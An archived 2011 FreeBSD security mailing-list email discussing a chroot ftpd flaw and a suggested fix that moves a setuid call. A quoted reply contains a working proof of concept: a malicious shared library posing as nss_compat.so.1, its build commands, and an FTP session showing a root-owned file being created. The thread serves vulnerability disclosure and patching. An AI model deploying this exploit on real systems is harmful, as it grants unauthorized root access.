From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:30:02 2011 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 24DE11065677 for ; Thu, 1 Dec 2011 01:30:02 +0000 (UTC) (envelope-from titus@buko.edc.ro) Received: from ns.edc.ro (ns.edc.ro [81.196.179.6]) by mx1.freebsd.org (Postfix) with ESMTP id B4A4C8FC0A for ; Thu, 1 Dec 2011 01:30:01 +0000 (UTC) Received: from buko.edc.ro ([86.122.169.89]) by ns.edc.ro (8.13.8/8.12.6) with ESMTP id pB11Au8X045817 for ; Thu, 1 Dec 2011 03:10:56 +0200 (EET) (envelope-from titus@buko.edc.ro) X-Virus-Status: Clean X-Virus-Scanned: clamav-milter 0.97 at unix.edc.ro Received: from buko.edc.ro (localhost [127.0.0.1]) by buko.edc.ro (8.13.8/8.13.1) with ESMTP id pB11AuQC067175 for ; Thu, 1 Dec 2011 03:10:56 +0200 (EET) (envelope-from titus@buko.edc.ro) X-Virus-Status: Clean X-Virus-Scanned: clamav-milter 0.97 at buko.edc.ro Received: (from titus@localhost) by buko.edc.ro (8.13.8/8.13.1/Submit) id pB11AtuS067174 for freebsd-security@freebsd.org; Thu, 1 Dec 2011 03:10:55 +0200 (EET) (envelope-from titus) Date: Thu, 1 Dec 2011 03:10:55 +0200 From: Titus Manea To: freebsd-security@freebsd.org Message-ID: <20111201031055.A67122@buko.edc.ro> References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> <4ED6D1CD.9080700@sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4ED6D1CD.9080700@sentex.net>; from mike@sentex.net on Wed, Nov 30, 2011 at 08:01:01PM -0500 X-Greylist: IP, sender and recipient auto-whitelisted, not delayed by milter-greylist-2.0.2 (ns.edc.ro [81.196.179.6]); Thu, 01 Dec 2011 03:10:56 +0200 (EET) Subject: Re: ftpd security issue ? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 01 Dec 2011 01:30:02 -0000 Move the seteuid pid = (strcmp(gargv[0], _PATH_LS) == 0) ? fork() : vfork(); switch(pid) { case -1: /* error */ (void)close(pdes[0]); (void)close(pdes[1]); goto pfree; /* NOTREACHED */ case 0: /* child */ setuid(geteuid()); On Wed, Nov 30, 2011 at 08:01:01PM -0500, Mike Tancsa wrote: > On 11/30/2011 7:01 PM, Xin LI wrote: > > > >> BTW. This vulnerability affects only configurations, where > >> /etc/ftpchroot exists or anonymous user is allowed to create files > >> inside etc and lib dirs. > > > > This doesn't seem to be typical configuration or no? > > I think in shared hosting environments it would be somewhat common. For > annon ftp, I dont think the anon user would be able to create / write to > a lib directory. > > > > > Will the attached patch fix the problem? > > > > (I think libc should just refuse /etc/nsswitch.conf and libraries if > > they are writable by others by the way) > > It does not seem to prevent the issue for me. Using Przemyslaw program's, > > #include > #include > > void _init() { > setuid(0); > setgid(0); > FILE *fp = fopen("/newfile", "w+"); > fprintf(fp, "%d %d\n", getuid(), geteuid()); > } > > cc -o dummy.o -c dummy.c -fPIC ; cc -shared -Wl,-soname,dummy.so -o > dummy.so dummy.o -nostartfiles ; mv dummy.so > ~testuser/lib/nss_compat.so.1 ; chown testuser ~testuser/lib/nss_compat.so.1 > > > ftp localhost > Trying 127.0.0.1... > Connected to localhost. > 220 vmtest.localdomain FTP server (Version 6.00LS) ready. > Name (localhost:mdtancsa): testuser > 331 Password required for testuser. > Password: > 230 User testuser logged in, access restrictions apply. > Remote system type is UNIX. > Using binary mode to transfer files. > ftp> dir > 229 Entering Extended Passive Mode (|||62436|) > 150 Opening ASCII mode data connection for '/bin/ls'. > total 106 > -rw-r--r-- 1 1002 1002 763 Nov 30 15:17 .cshrc > -rw------- 1 1002 1002 193 Nov 30 16:36 .history > drwxr-xr-x 2 1002 1002 512 Nov 30 16:05 etc > -r-xr-xr-x 1 0 1002 95076 Nov 30 19:50 ftpd > drwxr-xr-x 2 1002 1002 512 Nov 30 19:56 lib > -rw-r--r-- 1 0 1002 79 Nov 30 16:34 t.c > -rwxr-xr-x 1 0 1002 24 Nov 30 16:37 t.sh > 226 Transfer complete. > ftp> dir > 229 Entering Extended Passive Mode (|||50577|) > 150 Opening ASCII mode data connection for '/bin/ls'. > total 108 > -rw-r--r-- 1 1002 1002 763 Nov 30 15:17 .cshrc > -rw------- 1 1002 1002 193 Nov 30 16:36 .history > drwxr-xr-x 2 1002 1002 512 Nov 30 16:05 etc > -r-xr-xr-x 1 0 1002 95076 Nov 30 19:50 ftpd > drwxr-xr-x 2 1002 1002 512 Nov 30 19:56 lib > -rw-r--r-- 1 0 1002 4 Nov 30 19:58 newfile > -rw-r--r-- 1 0 1002 79 Nov 30 16:34 t.c > -rwxr-xr-x 1 0 1002 24 Nov 30 16:37 t.sh > 226 Transfer complete. > ftp> > > the file created is root > > > -- > ------------------- > Mike Tancsa, tel +1 519 651 3400 > Sentex Communications, mike@sentex.net > Providing Internet services since 1994 www.sentex.net > Cambridge, Ontario Canada http://www.tancsa.com/ > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" -- --------------------------------------------------------------------- How an engineer writes a program: Starts by debugging an empty file... Titus Manea | Eastern Digital Inc.